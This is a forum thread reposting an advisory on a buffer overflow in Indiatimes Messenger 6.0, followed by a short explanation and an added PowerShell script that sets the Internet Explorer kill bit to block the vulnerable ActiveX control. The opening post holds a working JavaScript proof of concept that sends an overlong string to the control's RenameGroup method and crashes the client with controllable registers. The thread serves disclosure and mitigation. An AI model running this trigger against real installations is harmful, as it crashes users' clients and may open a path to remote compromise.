sunny

Indiatimes Messenger 6.0 Buffer Overflow


[CODE]
Indiatimes Messenger 6.0 Buffer Overflow (Remote)

Vulnerable Program : Indiatimes Messenger v6.0 (Latest)
Vendor URL : http://messenger.indiatimes.com/
Exploit Type : Remote DoS (Remote Compromise may also be possible)

Proof Of Concept:

[script]
var obj1 = new ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";
for(i=0; i<1000; i++)
{
  buf += "A";
}
while(obj1.GetServerStatus() != "Logged In"); // wait till login
obj1.RenameGroup("Friends", buf, 5);
[/script]

The program (MMClient.exe) crashes @
004B681B   8979 04          mov dword ptr ds:[ecx+4],edi
with registers ecx, and edi = 0x41414141 [controllable]

So, remote compromise may be possible (not confirmed).
[/CODE]


You should explain the reason for this code; it doesn't do one any good if you just slap a code and not explain it.


Explanation: Indiatimes Messenger is a communication client application just like Yahoo! Messenger. The Indiatimes Messenger is used by the site http://www.indiatimes.com/ as usual.

Indiatimes.com also has some issues with their web site, like in the registration process, but that is a different story.

Anyways, Indiatimes Messenger shows some problematic behaviour under certain conditions, which may lead to a buffer overflow and thus also result in remote compromise.

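A mitigation for the scenario in the first post, added here as an example and not part of the original thread: the proof of concept reaches RenameGroup by instantiating the MMClient.MunduMessenger.1 ActiveX control from script, so setting the Internet Explorer kill bit for that control's CLSID stops web pages from creating it. The script assumes an elevated PowerShell 3.0+ session and looks the CLSID up on the local machine, because the thread does not give it; the function names are illustrative.

```powershell
# Added example: set the IE kill bit for the control named in the proof of concept.
$ProgId  = 'MMClient.MunduMessenger.1'   # ProgID taken from the post
$KillBit = 0x400                         # "Compatibility Flags" bit that blocks instantiation in IE

function Get-ClsidFromProgId {
    param([string]$ProgId, [Microsoft.Win32.RegistryView]$View)
    $root = [Microsoft.Win32.RegistryKey]::OpenBaseKey([Microsoft.Win32.RegistryHive]::ClassesRoot, $View)
    try {
        $key = $root.OpenSubKey("$ProgId\CLSID")
        if ($null -eq $key) { return $null }   # control not registered in this view
        $clsid = [string]$key.GetValue('')     # default value holds the "{...}" CLSID
        $key.Close()
        return $clsid
    }
    finally { $root.Close() }
}

function Set-ActiveXKillBit {
    param([string]$Clsid, [Microsoft.Win32.RegistryView]$View)
    $hklm = [Microsoft.Win32.RegistryKey]::OpenBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $View)
    try {
        # CreateSubKey opens the key if it already exists.
        $key = $hklm.CreateSubKey("SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
        # Keep any flags already present and OR in the kill bit.
        $current = [int]$key.GetValue('Compatibility Flags', 0)
        $key.SetValue('Compatibility Flags', ($current -bor $KillBit), [Microsoft.Win32.RegistryValueKind]::DWord)
        $key.Close()
    }
    finally { $hklm.Close() }
}

# A 32-bit control on 64-bit Windows registers in the 32-bit view, so check both views.
$views = @([Microsoft.Win32.RegistryView]::Registry32)
if ([Environment]::Is64BitOperatingSystem) { $views += [Microsoft.Win32.RegistryView]::Registry64 }

foreach ($view in $views) {
    $clsid = Get-ClsidFromProgId -ProgId $ProgId -View $view
    if ($clsid -match '^\{[0-9A-Fa-f-]{36}\}$') {   # only write when a well-formed CLSID was found
        Set-ActiveXKillBit -Clsid $clsid -View $view
        "Kill bit set for $ProgId ($clsid) in the $view view"
    } else {
        "$ProgId is not registered in the $view view"
    }
}
```

The kill bit only prevents Internet Explorer from hosting the control; the crash in MMClient.exe itself remains until the vendor fixes the method.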
